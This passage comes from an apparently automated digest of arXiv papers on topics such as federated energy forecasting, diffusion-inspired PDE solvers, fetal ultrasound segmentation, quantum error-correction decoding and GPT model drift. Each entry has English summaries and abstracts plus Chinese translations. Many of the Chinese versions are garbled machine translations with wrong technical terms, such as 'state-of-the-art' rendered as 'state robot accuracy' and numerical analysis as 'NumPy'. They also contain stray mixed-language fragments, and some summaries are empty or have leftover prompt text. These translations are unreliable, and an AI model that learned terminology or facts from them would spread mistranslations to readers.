drifts. We prove a regret bound for the performance of the proposed algorithm. Besides, we evaluate our method via numerical analysis using synthetic and real-world datasets to detect the regions that contribute the most to the spread of Covid-19 in Italy.

摘要
纷纷决策下面存在长时间反馈延迟，这会导致学习代理人的表现下降，无法在长期内确定优化收益的子集。在非站点环境中，抽象依赖关系的赏金分布难以预测，这使得问题变得更加挑战。因此，除了适应延迟和环境变化之外，学习 causal 关系可以减轻延迟的负面影响。我们将此设定形式化为非站点和延迟 combinatorial 半带抽象问题，使用 causally 相关的赏金分布模型。我们的代理人通过延迟反馈学习 structural 相关性，并使用这些相关性来优化决策。我们证明了我们提出的算法的 regret bound。此外，我们通过NumPy和实际数据进行数学分析，以便检测意大利COVID-19 的扩散区域。

A Federated learning model for Electric Energy management using Blockchain Technology

paper_url: http://arxiv.org/abs/2307.09080
repo_url: None
paper_authors: Muhammad Shoaib Farooq, Azeen Ahmed Hayat
For: The paper aims to address energy shortfall and electricity load shedding in developing countries by improving energy management and increasing the use of renewable energy sources.* Methods: The paper proposes the use of federated learning and blockchain technology to forecast energy requirements and ensure transparency, traceability, and security in energy transactions between prosumers and consumers.* Results: The experiment results show that renewable energy sources have produced better and comparable results to other non-renewable energy resources.Here’s the simplified Chinese text for the three points:* For: 这篇论文目的是解决发展中国家的能源短缺和电力卸载问题，通过改善能源管理和使用可再生能源。* Methods: 论文提议使用联邦学习和区块链技术，对消费者和生产者之间的能源交易进行透明度、跟踪性和安全性的保障。* Results: 实验结果表明，可再生能源资源比其他非可再生能源资源更好和相当。

Abstract
Energy shortfall and electricity load shedding are the main problems for developing countries. The main causes are lack of management in the energy sector and the use of non-renewable energy sources. The improved energy management and use of renewable sources can be significant to resolve energy crisis. It is necessary to increase the use of renewable energy sources (RESs) to meet the increasing energy demand due to high prices of fossil-fuel based energy. Federated learning (FL) is the most emerging technique in the field of artificial intelligence. Federated learning helps to generate global model at server side by ensemble locally trained models at remote edges sites while preserving data privacy. The global model used to predict energy demand to satisfy the needs of consumers. In this article, we have proposed Blockchain based safe distributed ledger technology for transaction of data between prosumer and consumer to ensure their transparency, traceability and security. Furthermore, we have also proposed a Federated learning model to forecast the energy requirements of consumer and prosumer. Moreover, Blockchain has been used to store excess energy data from prosumer for better management of energy between prosumer and grid. Lastly, the experiment results revealed that renewable energy sources have produced better and comparable results to other non-renewable energy resources.

摘要
发展中国家面临着能源短缺和电力卸载危机，主要原因是能源部门的管理不足和使用非可再生能源。通过改善能源管理和使用可再生能源，可以有效解决能源危机。随着化石燃料基本能源价格的上涨，使用可再生能源成为了解决能源危机的重要手段。最新的技术之一是联邦学习（FL），它可以在远程的边缘设备上 ensemble 本地训练的模型，而不需要将数据传输到服务器端，以保护数据隐私。这个全球模型可以预测消费者的能源需求，并且可以使用可再生能源来满足消费者的需求。本文提出了基于区块链的安全分布式笔记录技术，用于在消费者和生产者之间传输数据，以确保数据的透明度、可追溯性和安全性。此外，我们还提出了基于联邦学习的能源需求预测模型，以便更好地预测消费者和生产者的能源需求。此外，使用区块链存储生产者的剩余能源数据，以便更好地管理能源的协调。实验结果表明，可再生能源可以生产更好的和相对比较好的结果，相比于其他非可再生能源资源。

DiTTO: Diffusion-inspired Temporal Transformer Operator

paper_url: http://arxiv.org/abs/2307.09072
repo_url: None
paper_authors: Oded Ovadia, Eli Turkel, Adar Kahana, George Em Karniadakis
for: 用于解决时间取值积分方程（PDE）。
methods: 使用数据驱动的操作学习方法，不需要时间排序。
results: 在多维度的 burgers 方程、navier-stokes 方程和声波方程上达到了状态机器人精度。 Additionally, the method can perform zero-shot super-resolution in time.Here’s the full text in Simplified Chinese:
for: 本文用于解决时间取值积分方程（PDE）。
methods: 本文提出了一种基于操作学习的数据驱动方法，不需要时间排序。
results: 在多维度的 burgers 方程、navier-stokes 方程和声波方程上，本方法达到了状态机器人精度。此外，方法还可以实现零试验超分辨率。

Abstract
Solving partial differential equations (PDEs) using a data-driven approach has become increasingly common. The recent development of the operator learning paradigm has enabled the solution of a broader range of PDE-related problems. We propose an operator learning method to solve time-dependent PDEs continuously in time without needing any temporal discretization. The proposed approach, named DiTTO, is inspired by latent diffusion models. While diffusion models are usually used in generative artificial intelligence tasks, their time-conditioning mechanism is extremely useful for PDEs. The diffusion-inspired framework is combined with elements from the Transformer architecture to improve its capabilities. We demonstrate the effectiveness of the new approach on a wide variety of PDEs in multiple dimensions, namely the 1-D Burgers' equation, 2-D Navier-Stokes equations, and the acoustic wave equation in 2-D and 3-D. DiTTO achieves state-of-the-art results in terms of accuracy for these problems. We also present a method to improve the performance of DiTTO by using fast sampling concepts from diffusion models. Finally, we show that DiTTO can accurately perform zero-shot super-resolution in time.

摘要
解决部分梯度方程（PDEs）使用数据驱动方法已成为日益普遍。最近的运算学学 paradigm的发展已使得解决更广泛的 PDE 相关问题变得可能。我们提议一种运算学学方法，名为 DiTTO，可以连续地在时间上解决时间依赖的 PDE。该方法灵感于潜在扩散模型，而扩散模型通常用于生成人工智能任务。扩散启发的框架与 transformer 架构的元素相结合，以提高其能力。我们在多维 PDE 上进行了广泛的实验，包括一维拜尔斯坦方程、二维奈尔-斯托克方程以及二维和三维的声波方程。DiTTO 在这些问题上达到了最新的精度标准。此外，我们还提出了使用快速抽样概念从扩散模型来提高 DiTTO 的性能的方法。最后，我们展示了 DiTTO 可以准确地进行零 shot 超分辨率在时间上。

Evaluate Fine-tuning Strategies for Fetal Head Ultrasound Image Segmentation with U-Net

paper_url: http://arxiv.org/abs/2307.09067
repo_url: https://github.com/13204942/ft_methods_for_fetal_head_segmentation
paper_authors: Fangyijie Wang, Guénolé Silvestre, Kathleen M. Curran
for: 这篇研究的目的是提高妊娠期间胎头圆周盘 circumference（HC）的测量效率，使用扩展学习（Transfer Learning，TL）方法来改善医疗生物米etry的精度。
methods: 本研究使用了潜在神经网络（Convolutional Neural Network，CNN）模型，并使用了轻量级的 MobileNet 作为数据库的数据库。
results: 研究发现，使用 Transfer Learning 方法可以将胎头像的数据库训练为 U-Net 网络，并且可以实现高度的准确性，仅需要有限的训练时间和资源。此外，本研究还发现，使用 Transfer Learning 方法可以实现较小的模型大小，并且可以提高模型的稳定性和可靠性。

Abstract
Fetal head segmentation is a crucial step in measuring the fetal head circumference (HC) during gestation, an important biometric in obstetrics for monitoring fetal growth. However, manual biometry generation is time-consuming and results in inconsistent accuracy. To address this issue, convolutional neural network (CNN) models have been utilized to improve the efficiency of medical biometry. But training a CNN network from scratch is a challenging task, we proposed a Transfer Learning (TL) method. Our approach involves fine-tuning (FT) a U-Net network with a lightweight MobileNet as the encoder to perform segmentation on a set of fetal head ultrasound (US) images with limited effort. This method addresses the challenges associated with training a CNN network from scratch. It suggests that our proposed FT strategy yields segmentation performance that is comparable when trained with a reduced number of parameters by 85.8%. And our proposed FT strategy outperforms other strategies with smaller trainable parameter sizes below 4.4 million. Thus, we contend that it can serve as a dependable FT approach for reducing the size of models in medical image analysis. Our key findings highlight the importance of the balance between model performance and size in developing Artificial Intelligence (AI) applications by TL methods. Code is available at https://github.com/13204942/FT_Methods_for_Fetal_Head_Segmentation.

摘要
Gestational fetal head circumference (HC) measurement is crucial, and manual biometry is time-consuming and prone to errors. To address this, convolutional neural networks (CNNs) have been used for biometry. However, training a CNN from scratch is challenging. To solve this, we proposed a transfer learning (TL) method. Our approach involves fine-tuning a U-Net network with a lightweight MobileNet as the encoder to perform segmentation on a set of fetal head ultrasound (US) images with minimal effort. This method addresses the challenges of training a CNN from scratch and shows that our proposed FT strategy achieves segmentation performance comparable to training with a reduced number of parameters by 85.8%. Our proposed FT strategy also outperforms other strategies with smaller trainable parameter sizes below 4.4 million. Therefore, we suggest that our FT approach is a reliable method for reducing the size of models in medical image analysis. Our findings highlight the importance of balancing model performance and size in developing artificial intelligence (AI) applications using TL methods. 针对妊娠期胎头径的量度是至关重要，但是手动测量是时间费时且精度不稳定。为解决这个问题，人工神经网络（CNN）已经被应用于生物метría。然而，从零开始训练CNN是一项具有挑战性的任务。为解决这个问题，我们提出了传输学习（TL）方法。我们的方法涉及到了精细调整U-Net网络的 MobileNet 作为编码器，以实现对一组妊娠期胎头ultrasound（US）图像进行分割，即使是很少的努力。这种方法解决了训练CNN从零开始的挑战，并表明了我们的FT策略可以与减少参数数量的85.8%相比，实现分割性能。此外，我们的FT策略还超过了其他具有更小的可学习参数数量的策略。因此，我们建议这种FT方法可以作为医疗图像分析中减小模型的可靠方法。我们的关键发现指出了在通过TL方法开发人工智能应用程序时，模型性能和模型大小之间的平衡是非常重要的。

Learning Adaptive Neighborhoods for Graph Neural Networks

paper_url: http://arxiv.org/abs/2307.09065
repo_url: None
paper_authors: Avishkar Saha, Oscar Mendez, Chris Russell, Richard Bowden
for: 实现终端学习于 гра组织资料上，但许多工作假设已知 graph 结构。当输入 graph 是噪音或无法取得时，一种方法是建构或学习 latent graph 结构。这些方法通常固定 graph 结构中每个 node 的度量，这是不佳的。相反，我们提出了一个 novel end-to-end differentiable graph generator，可以建构 graph 结构，每个 node 可以选择它的邻居和大小。
methods: 我们提出了一个 novel end-to-end differentiable graph generator，可以建构 graph 结构，每个 node 可以选择它的邻居和大小。
results: 我们将我们的模组 integrate 到 trajectory prediction, point cloud classification 和 node classification pipeline 中，实现了与其他 structure-learning 方法相比的提高精度，在各种数据集和 GCN 背景下。

Abstract
Graph convolutional networks (GCNs) enable end-to-end learning on graph structured data. However, many works assume a given graph structure. When the input graph is noisy or unavailable, one approach is to construct or learn a latent graph structure. These methods typically fix the choice of node degree for the entire graph, which is suboptimal. Instead, we propose a novel end-to-end differentiable graph generator which builds graph topologies where each node selects both its neighborhood and its size. Our module can be readily integrated into existing pipelines involving graph convolution operations, replacing the predetermined or existing adjacency matrix with one that is learned, and optimized, as part of the general objective. As such it is applicable to any GCN. We integrate our module into trajectory prediction, point cloud classification and node classification pipelines resulting in improved accuracy over other structure-learning methods across a wide range of datasets and GCN backbones.

摘要
格点卷积网络（GCN）可以实现端到端学习在格式化数据上。然而，许多工作假设给定的图结构。当输入图是噪音或不可用时，一种方法是构建或学习隐藏的图结构。这些方法通常固定整个图的节点度，这是不优化的。相反，我们提出了一种新的终端可微的图生成器，它可以在每个节点选择其邻居和大小。我们的模块可以轻松地与现有的图卷积操作相结合，将预先确定或现有的相互作用矩阵 replaced with一个学习和优化的矩阵，并成为任何GCN的一部分。因此，它是可应用的。我们将我们的模块集成到了路径预测、点云分类和节点分类管道中，从而在各种数据集和GCN脊梁上实现了与其他结构学习方法相比较高的准确率。

Extreme heatwave sampling and prediction with analog Markov chain and comparisons with deep learning

paper_url: http://arxiv.org/abs/2307.09060
repo_url: None
paper_authors: George Miloshevich, Dario Lucente, Pascal Yiou, Freddy Bouchet
For: The paper aims to develop a data-driven emulator, called stochastic weather generator (SWG), to estimate the probabilities of prolonged heatwaves in France and Scandinavia.* Methods: The SWG emulator uses the method of analogs of circulation, which is combined with temperature and soil moisture as predictor fields. The emulator is trained on an intermediate complexity climate model run, and the performance is evaluated using proper score appropriate for rare events. Dimensionality reduction techniques are applied to accelerate the computation of analogs.* Results: The probabilistic prediction achieved with SWG is compared with the one achieved with Convolutional Neural Network (CNN). The SWG emulator trained on 80 years of data is capable of estimating extreme return times of order of thousands of years for heatwaves longer than several days more precisely than the fit based on generalised extreme value distribution. The quality of its synthetic extreme teleconnection patterns obtained with stochastic weather generator is studied, and two examples of such synthetic teleconnection patterns for heatwaves in France and Scandinavia are provided.

Abstract
We present a data-driven emulator, stochastic weather generator (SWG), suitable for estimating probabilities of prolonged heatwaves in France and Scandinavia. This emulator is based on the method of analogs of circulation to which we add temperature and soil moisture as predictor fields. We train the emulator on an intermediate complexity climate model run and show that it is capable of predicting conditional probabilities (forecasting) of heatwaves out of sample. Special attention is payed that this prediction is evaluated using proper score appropriate for rare events. To accelerate the computation of analogs dimensionality reduction techniques are applied and the performance is evaluated. The probabilistic prediction achieved with SWG is compared with the one achieved with Convolutional Neural Network (CNN). With the availability of hundreds of years of training data CNNs perform better at the task of probabilistic prediction. In addition, we show that the SWG emulator trained on 80 years of data is capable of estimating extreme return times of order of thousands of years for heatwaves longer than several days more precisely than the fit based on generalised extreme value distribution. Finally, the quality of its synthetic extreme teleconnection patterns obtained with stochastic weather generator is studied. We showcase two examples of such synthetic teleconnection patterns for heatwaves in France and Scandinavia that compare favorably to the very long climate model control run.

摘要
我们介绍了一个数据驱动的模拟器，随机天气生成器（SWG），用于估计法国和斯堪的纳维亚地区的持续高温事件的可能性。这个模拟器基于流体动力学方法，并添加温度和土壤湿度作为预测字段。我们使用一个中间复杂度气候模型的训练来训练这个模拟器，并显示它可以预测基于样本外的条件概率（预测）高温事件。特别是，我们使用合适的评价函数来评估这种预测，以确保对罕见事件进行正确的评估。为加速计算流体的维度减少技术是应用于 analogs，并评估其性能。我们还比较了使用 convolutional neural network（CNN）进行probabilistic预测的性能。通过使用数百年的训练数据，CNN在这项任务上表现更好。此外，我们发现使用80年的数据训练SWG模拟器可以更正精确地估计高温事件持续时间长于数天的极端返回时间，与基于总体极值分布的预测相比。最后，我们研究了SWG模拟器生成的 sintethic极端 теле连接模式的质量。我们展示了法国和斯堪的纳维亚两个高温事件的 sintethic tele连接模式，与非常长气候模型控制运行相比，表现良好。

Deep learning for unsupervised domain adaptation in medical imaging: Recent advancements and future perspectives

paper_url: http://arxiv.org/abs/2308.01265
repo_url: None
paper_authors: Suruchi Kumari, Pravendra Singh
for: 本文主要探讨了医学成像领域中最新的深度学习领域适应（Unsupervised Domain Adaptation，UDA）技术，以及它们在各种医学成像任务中的应用。
methods: 本文分析了医学成像领域中最新的UDA方法，包括特征对应、图像翻译、自我超vision和分解表示方法等多种方法。
results: 本文对各种UDA方法进行了技术分析和评估，并将其分为六个类别，包括图像分类、生物marks检测、肿瘤识别、脑成像分析、肠胃成像分析等多种任务。

Abstract
Deep learning has demonstrated remarkable performance across various tasks in medical imaging. However, these approaches primarily focus on supervised learning, assuming that the training and testing data are drawn from the same distribution. Unfortunately, this assumption may not always hold true in practice. To address these issues, unsupervised domain adaptation (UDA) techniques have been developed to transfer knowledge from a labeled domain to a related but unlabeled domain. In recent years, significant advancements have been made in UDA, resulting in a wide range of methodologies, including feature alignment, image translation, self-supervision, and disentangled representation methods, among others. In this paper, we provide a comprehensive literature review of recent deep UDA approaches in medical imaging from a technical perspective. Specifically, we categorize current UDA research in medical imaging into six groups and further divide them into finer subcategories based on the different tasks they perform. We also discuss the respective datasets used in the studies to assess the divergence between the different domains. Finally, we discuss emerging areas and provide insights and discussions on future research directions to conclude this survey.

摘要
深度学习在医疗影像领域已经表现出惊人的表现。然而，这些方法主要偏向于有监督学习，假设训练和测试数据来自同一个分布。然而，这种假设可能不 siempre 成立。为 Address 这些问题，无监督领域适应（UDA）技术被开发出来，以传递来自标注域的知识到相关 yet unlabeled 域。在过去几年中，UDA 领域内有了大量的进展，包括特征对齐、图像翻译、自我监督和分解表示方法等。在本文中，我们提供了医疗影像领域的深度 UDA 方法的全面文献回顾，具体来说，我们将当前 UDA 研究分为六个组，并将它们进一步分为不同任务的子类别。我们还讨论了不同研究使用的数据集，以评估不同领域之间的差异。最后，我们提出了未来研究的前景和意见，以结束本文的报告。

Globally solving the Gromov-Wasserstein problem for point clouds in low dimensional Euclidean spaces

paper_url: http://arxiv.org/abs/2307.09057
repo_url: None
paper_authors: Martin Ryner, Jan Kronqvist, Johan Karlsson
for: Computes the Gromov-Wasserstein problem between two sets of points in low dimensional spaces, to quantify the similarity between two formations or shapes.
methods: Reformulates the Quadratic Assignment Problem (QAP) as an optimization problem with a low-dimensional domain, leveraging the fact that the problem can be expressed as a concave quadratic optimization problem with low rank.
results: Scales well with the number of points and can be used to find the global solution for large-scale problems with thousands of points.

Abstract
This paper presents a framework for computing the Gromov-Wasserstein problem between two sets of points in low dimensional spaces, where the discrepancy is the squared Euclidean norm. The Gromov-Wasserstein problem is a generalization of the optimal transport problem that finds the assignment between two sets preserving pairwise distances as much as possible. This can be used to quantify the similarity between two formations or shapes, a common problem in AI and machine learning. The problem can be formulated as a Quadratic Assignment Problem (QAP), which is in general computationally intractable even for small problems. Our framework addresses this challenge by reformulating the QAP as an optimization problem with a low-dimensional domain, leveraging the fact that the problem can be expressed as a concave quadratic optimization problem with low rank. The method scales well with the number of points, and it can be used to find the global solution for large-scale problems with thousands of points. We compare the computational complexity of our approach with state-of-the-art methods on synthetic problems and apply it to a near-symmetrical problem which is of particular interest in computational biology.

摘要
However, the Gromov-Wasserstein problem is computationally intractable, even for small problems, and is typically formulated as a Quadratic Assignment Problem (QAP). Our framework addresses this challenge by reformulating the QAP as an optimization problem with a low-dimensional domain, leveraging the fact that the problem can be expressed as a concave quadratic optimization problem with low rank.The proposed method scales well with the number of points and can be used to find the global solution for large-scale problems with thousands of points. We compare the computational complexity of our approach with state-of-the-art methods on synthetic problems and apply it to a near-symmetrical problem of particular interest in computational biology.

Outlier-Robust Tensor Low-Rank Representation for Data Clustering

paper_url: http://arxiv.org/abs/2307.09055
repo_url: None
paper_authors: Tong Wu
for: 提取受损张量数据中的异常点和分 clustering
methods: 基于张量特征值分解（t-SVD）的异常点检测和张量数据分 clustering
results: 可以 preciselly 恢复受损张量数据的行空间和检测异常点，并且可以 hanlde missing 数据情况。

Abstract
Low-rank tensor analysis has received widespread attention with many practical applications. However, the tensor data are often contaminated by outliers or sample-specific corruptions. How to recover the tensor data that are corrupted by outliers and perform data clustering remains a challenging problem. This paper develops an outlier-robust tensor low-rank representation (OR-TLRR) method for simultaneous outlier detection and tensor data clustering based on the tensor singular value decomposition (t-SVD) algebraic framework. It is motivated by the recently proposed tensor-tensor product induced by invertible linear transforms that satisfy certain conditions. For tensor observations with arbitrary outlier corruptions, OR-TLRR has provable performance guarantee for exactly recovering the row space of clean data and detecting outliers under mild conditions. Moreover, an extension of OR-TLRR is also proposed to handle the case when parts of the data are missing. Finally, extensive experimental results on both synthetic and real data demonstrate the effectiveness of the proposed algorithms.

摘要
低级张量分析已经广泛受到关注，有很多实际应用。然而，张量数据经常受到异常值或样本特定的损害。如何修复受损的张量数据，并对其进行分类仍然是一个困难的问题。这篇论文开发了一种对异常值敏感的张量低级表示（OR-TLRR）方法，用于同时检测异常值和张量数据的分类。它是基于张量单值分解（t-SVD）的代数框架的。对于受到 произвольными异常损害的张量观察数据，OR-TLRR有可证明的性能保证，可以准确地恢复干净数据的列空间和检测异常值，只要异常值的干扰程度不太大。此外，论文还提出了处理缺失数据的扩展方法。最后，论文的实验结果表明了提议的算法的效果。

qecGPT: decoding Quantum Error-correcting Codes with Generative Pre-trained Transformers

paper_url: http://arxiv.org/abs/2307.09025
repo_url: https://github.com/chy-i/qecgpt
paper_authors: Hanyan Cao, Feng Pan, Yijia Wang, Pan Zhang
for: 提出了一个通用框架 для解码量子错误修正码，使用生成模型。
methods: 使用自然语言处理技术，特别是Transformers，学习逻辑运算和症状的联合概率。
results: 可以高效地计算逻辑运算的可能性，并直接生成最有可能的逻辑运算结果，计算复杂度为 $\mathcal O(2k)$，比传统最大可能性decoding算法要好。

Abstract
We propose a general framework for decoding quantum error-correcting codes with generative modeling. The model utilizes autoregressive neural networks, specifically Transformers, to learn the joint probability of logical operators and syndromes. This training is in an unsupervised way, without the need for labeled training data, and is thus referred to as pre-training. After the pre-training, the model can efficiently compute the likelihood of logical operators for any given syndrome, using maximum likelihood decoding. It can directly generate the most-likely logical operators with computational complexity $\mathcal O(2k)$ in the number of logical qubits $k$, which is significantly better than the conventional maximum likelihood decoding algorithms that require $\mathcal O(4^k)$ computation. Based on the pre-trained model, we further propose refinement to achieve more accurately the likelihood of logical operators for a given syndrome by directly sampling the stabilizer operators. We perform numerical experiments on stabilizer codes with small code distances, using both depolarizing error models and error models with correlated noise. The results show that our approach provides significantly better decoding accuracy than the minimum weight perfect matching and belief-propagation-based algorithms. Our framework is general and can be applied to any error model and quantum codes with different topologies such as surface codes and quantum LDPC codes. Furthermore, it leverages the parallelization capabilities of GPUs, enabling simultaneous decoding of a large number of syndromes. Our approach sheds light on the efficient and accurate decoding of quantum error-correcting codes using generative artificial intelligence and modern computational power.

摘要

U-shaped Transformer: Retain High Frequency Context in Time Series Analysis

paper_url: http://arxiv.org/abs/2307.09019
repo_url: None
paper_authors: Qingkui Chen, Yiqin Zhang
for: 本研究旨在增进时间序列预测领域中的 neural network 性能，通过综合利用 transformer 和 MLP 两种网络结构。
methods: 本研究采用了 skip-layer 连接和 patch merge 和 split 操作，以提高 transformer 的低频特征表示能力，并使用更大的数据集来充分利用 transformer 背景。
results: 实验结果表明，模型在多个数据集上表现出了高水平的性能，而且比 traditional transformer 更加高效。

Abstract
Time series prediction plays a crucial role in various industrial fields. In recent years, neural networks with a transformer backbone have achieved remarkable success in many domains, including computer vision and NLP. In time series analysis domain, some studies have suggested that even the simplest MLP networks outperform advanced transformer-based networks on time series forecast tasks. However, we believe these findings indicate there to be low-rank properties in time series sequences. In this paper, we consider the low-pass characteristics of transformers and try to incorporate the advantages of MLP. We adopt skip-layer connections inspired by Unet into traditional transformer backbone, thus preserving high-frequency context from input to output, namely U-shaped Transformer. We introduce patch merge and split operation to extract features with different scales and use larger datasets to fully make use of the transformer backbone. Our experiments demonstrate that the model performs at an advanced level across multiple datasets with relatively low cost.

摘要
时间序列预测在各个产业领域发挥重要作用。近年来，基于 transformer 结构的神经网络在各个领域，如计算机视觉和自然语言处理，取得了很大成功。然而，一些研究表明，简单的多层感知网络可以在时间序列预测任务上超越高级 transformer 基于网络。我们认为这些发现反映了时间序列序列中的低级特性。在这篇论文中，我们考虑了 transformer 的低通Characteristics 和 MLP 网络的优点，并将它们结合在一起。我们采用了 skip-layer 连接，以保持输入到输出的高频上下文，即 U-shaped Transformer。我们还引入 patch 合并和拆分操作，以提取不同缩放的特征，并使用更大的数据集，以充分利用 transformer 脊梁。我们的实验表明，模型在多个数据集上表现出了高水平的性能，而且Relative low cost。

Multimodal LLMs for health grounded in individual-specific data

paper_url: http://arxiv.org/abs/2307.09018
repo_url: None
paper_authors: Anastasiya Belyaeva, Justin Cosentino, Farhad Hormozdiari, Krish Eswaran, Shravya Shetty, Greg Corrado, Andrew Carroll, Cory Y. McLean, Nicholas A. Furlotte
for: 这篇研究的目的是为了创建能够处理多种资料模式的大语言模型（LLMs），以解决各种领域中的问题，包括健康领域。
methods: 这篇研究使用了一个名为HeLM（Health Large Language Model for Multimodal Understanding）的框架，它可以将高维度的医疗资料与LLMs集成，以估计个人疾病风险。HeLM使用了一个Encoder来转换资料模式，将复杂的资料模式转换为LLM的token embedding空间，并将简单的资料模式转换为文本。
results: 根据UK Biobank的数据，HeLM可以有效地使用民生和医疗资料，以及高维度时间序列数据估计疾病风险。例如，HeLM在结合表格和呼吸图数据模式时，可以获得预测病例0.75的AUROC，比仅使用表格数据模式时的0.49要高。总的来说，HeLM在选择的八个二分类问题中，都能够超越或与класичного机器学习方法相等。此外，研究还评估了这个模型的扩展性和对个人健康和快速诊断的应用。

Abstract
Foundation large language models (LLMs) have shown an impressive ability to solve tasks across a wide range of fields including health. To effectively solve personalized health tasks, LLMs need the ability to ingest a diversity of data modalities that are relevant to an individual's health status. In this paper, we take a step towards creating multimodal LLMs for health that are grounded in individual-specific data by developing a framework (HeLM: Health Large Language Model for Multimodal Understanding) that enables LLMs to use high-dimensional clinical modalities to estimate underlying disease risk. HeLM encodes complex data modalities by learning an encoder that maps them into the LLM's token embedding space and for simple modalities like tabular data by serializing the data into text. Using data from the UK Biobank, we show that HeLM can effectively use demographic and clinical features in addition to high-dimensional time-series data to estimate disease risk. For example, HeLM achieves an AUROC of 0.75 for asthma prediction when combining tabular and spirogram data modalities compared with 0.49 when only using tabular data. Overall, we find that HeLM outperforms or performs at parity with classical machine learning approaches across a selection of eight binary traits. Furthermore, we investigate the downstream uses of this model such as its generalizability to out-of-distribution traits and its ability to power conversations around individual health and wellness.

摘要
基于大语言模型（LLM）的研究表明，LLM可以在各种领域解决问题，包括健康领域。为了在个人化医疗方面有效地解决问题，LLM需要能够处理个人健康状况相关的多种数据类型。在这篇论文中，我们开发了一个框架（HeLM：健康大语言模型 для多模态理解），帮助LLM使用个人化数据来估计疾病风险。HeLM将复杂的数据类型编码为将其映射到LLM的符号空间中，而简单的数据类型则通过将数据序列化为文本来实现。使用UK Biobank数据，我们显示了HeLM可以有效地使用人口和临床特征以及高维时序数据来估计疾病风险。例如，当 combining 表格和气流数据模式时，HeLM的 AUC 为 0.75，而只使用表格数据时的 AUC 为 0.49。总的来说，我们发现 HeLM 在选择的八个二分类特征上表现出色，并且与传统机器学习方法相当或超过其表现。此外，我们还 investigate HeLM 的下游应用，包括其对非标型特征的普适性和在个人医疗和健康谈话中的应用能力。

PLiNIO: A User-Friendly Library of Gradient-based Methods for Complexity-aware DNN Optimization

paper_url: http://arxiv.org/abs/2307.09488
repo_url: None
paper_authors: Daniele Jahier Pagliari, Matteo Risso, Beatrice Alessandra Motetti, Alessio Burrello
for: 这篇论文主要是为了提供一个开源的深度神经网络设计自动化库（PLiNIO），来搭配各种渐渐变小的优化技术，以提高深度神经网络在紧缩边缘设备上的效能。
methods: 这篇论文使用了许多现代的深度神经网络设计自动化技术，包括预测精度估计、优化搜索、阶层优化、卷积优化等，并将这些技术集成到一个开源库中，提供了一个易用的用户界面。
results: 根据实验结果，PLiNIO可以实现优化深度神经网络的体积和精度，并且可以实现大约94.34%的内存减少，却只有<1%的精度损失比基eline架构。

Abstract
Accurate yet efficient Deep Neural Networks (DNNs) are in high demand, especially for applications that require their execution on constrained edge devices. Finding such DNNs in a reasonable time for new applications requires automated optimization pipelines since the huge space of hyper-parameter combinations is impossible to explore extensively by hand. In this work, we propose PLiNIO, an open-source library implementing a comprehensive set of state-of-the-art DNN design automation techniques, all based on lightweight gradient-based optimization, under a unified and user-friendly interface. With experiments on several edge-relevant tasks, we show that combining the various optimizations available in PLiNIO leads to rich sets of solutions that Pareto-dominate the considered baselines in terms of accuracy vs model size. Noteworthy, PLiNIO achieves up to 94.34% memory reduction for a <1% accuracy drop compared to a baseline architecture.

摘要
高效减少内存的深度神经网络（DNN）在边缘设备上的应用越来越受欢迎，特别是在有限的边缘设备上运行。手动搜索大量的超参数组合是不可能的，因此需要自动优化管道。在这种情况下，我们提出PLiNIO，一个开源库，实现了现代DNN设计自动化技术的总集，所有基于轻量级的梯度基于优化，通过统一和易用的界面进行实现。经过一些边缘相关任务的实验，我们发现，PLiNIO中的多种优化技术的组合可以生成高精度和轻量级的解决方案，与考虑的基准架构相比，PLiNIO可以实现94.34%的内存减少，仅带来<1%的准确率下降。

How is ChatGPT’s behavior changing over time?

paper_url: http://arxiv.org/abs/2307.09009
repo_url: https://github.com/lchen001/llmdrift
paper_authors: Lingjiao Chen, Matei Zaharia, James Zou
for: 评估 GPT-3.5 和 GPT-4 两个大语言模型在不同时间点上的变化。
methods: 使用多种多样化任务评估 GPT-3.5 和 GPT-4 在不同时间点上的表现。
results: 发现 GPT-4 和 GPT-3.5 在不同时间点上的表现和行为可能会有很大的变化，如 prime vs. composite numbers 识别 task 中 GPT-4 (3月2023) 的表现比 GPT-4 (6月2023) 更好，但是 GPT-3.5 在6月的表现更好于3月。

Abstract
GPT-3.5 and GPT-4 are the two most widely used large language model (LLM) services. However, when and how these models are updated over time is opaque. Here, we evaluate the March 2023 and June 2023 versions of GPT-3.5 and GPT-4 on several diverse tasks: 1) math problems, 2) sensitive/dangerous questions, 3) opinion surveys, 4) multi-hop knowledge-intensive questions, 5) generating code, 6) US Medical License tests, and 7) visual reasoning. We find that the performance and behavior of both GPT-3.5 and GPT-4 can vary greatly over time. For example, GPT-4 (March 2023) was reasonable at identifying prime vs. composite numbers (84% accuracy) but GPT-4 (June 2023) was poor on these same questions (51% accuracy). This is partly explained by a drop in GPT-4's amenity to follow chain-of-thought prompting. Interestingly, GPT-3.5 was much better in June than in March in this task. GPT-4 became less willing to answer sensitive questions and opinion survey questions in June than in March. GPT-4 performed better at multi-hop questions in June than in March, while GPT-3.5's performance dropped on this task. Both GPT-4 and GPT-3.5 had more formatting mistakes in code generation in June than in March. Overall, our findings show that the behavior of the "same" LLM service can change substantially in a relatively short amount of time, highlighting the need for continuous monitoring of LLMs.

摘要

OxfordVGG Submission to the EGO4D AV Transcription Challenge

paper_url: http://arxiv.org/abs/2307.09006
repo_url: https://github.com/m-bain/whisperx
paper_authors: Jaesung Huh, Max Bain, Andrew Zisserman
for: 本研究报告提供了2023年EGO4D音频视觉自动语音识别挑战（AV-ASR）中oxfordvgg团队的技术细节。
methods: 本研究使用了WhisperX系统，用于高效处理长形audio的语音识别，并且使用了两个公开可用的文本标准化器。
results: 本研究在挑战测试集上取得56.0%的字误率（WER），排名第一名在排行板上。所有基eline代码和模型可以在https://github.com/m-bain/whisperX上获取。

Abstract
This report presents the technical details of our submission on the EGO4D Audio-Visual (AV) Automatic Speech Recognition Challenge 2023 from the OxfordVGG team. We present WhisperX, a system for efficient speech transcription of long-form audio with word-level time alignment, along with two text normalisers which are publicly available. Our final submission obtained 56.0% of the Word Error Rate (WER) on the challenge test set, ranked 1st on the leaderboard. All baseline codes and models are available on https://github.com/m-bain/whisperX.

摘要
这份报告介绍了我们在EGO4D Audio-Visual（AV）自动话语识别挑战2023中的提交技术细节，来自于牛津VGG团队。我们提出了一种名为WhisperX的高效语音转文本系统，以及两种公共可用的文本Normalizer。我们的最终提交在挑战测试集上达到56.0%的字SError率，排名第一名。所有基线代码和模型可以在https://github.com/m-bain/whisperX上下载。Note: The translation is in Simplified Chinese, which is the standard writing system used in mainland China. If you need Traditional Chinese, please let me know.

Zero-shot Domain-sensitive Speech Recognition with Prompt-conditioning Fine-tuning

paper_url: http://arxiv.org/abs/2307.10274
